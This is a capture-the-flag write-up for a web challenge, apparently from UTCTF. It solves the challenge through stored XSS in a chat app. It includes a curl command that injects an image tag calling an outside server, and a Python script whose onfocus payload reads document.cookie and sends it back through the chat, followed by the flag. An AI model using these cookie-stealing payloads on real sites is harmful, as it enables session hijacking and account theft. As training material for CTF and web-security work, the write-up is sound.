Chatt with Bratt [Web]

Chatt with Bratt

After announcing that he would be having an anonymous 1-on-1 AMA with randomly chosen, adoring fans, an engineering team hacked together a web app and likely forget to patch some obvious security holes.

Recon

Chat application. You send messages as "Anon" to a person named "Bratt Pitt".

Including an image tag will make "Bratt Pitt" visit our server:

export ses="b6489e18-6184-11ea-bf69-e6d97c3cba85"

curl -svv 'http://web3.utctf.live:8080/chatt' \
    -H 'Content-Type: application/json' \
    -H "Cookie: chat_id=$ses; secret=none" \
    -d '{"content": "AAAA<img src=\"https://spotless.tech/bla\"/>"}'

Since we have XSS, we can steal Bratt's cookies using a <input> tag with autofocus and onfocus attributes.

import requests

cookies = {
    'chat_id': 'b6489e18-6184-11ea-bf69-e6d97c3cba85',
    'secret': 'none',
}

headers = {
    'Content-Type': 'application/json',
}

data = {
    "content": """

AAAAAAAAAA<input autofocus onfocus="document.getElementById('message').value = document.cookie;sendMessage();">

    """.strip()
}

response = requests.post('http://web3.utctf.live:8080/chatt', headers=headers, cookies=cookies, json=data)

Bratt will send us the flag through chat.

Flag

utflag{95debad95cfb106081f33ceadc36bf9c}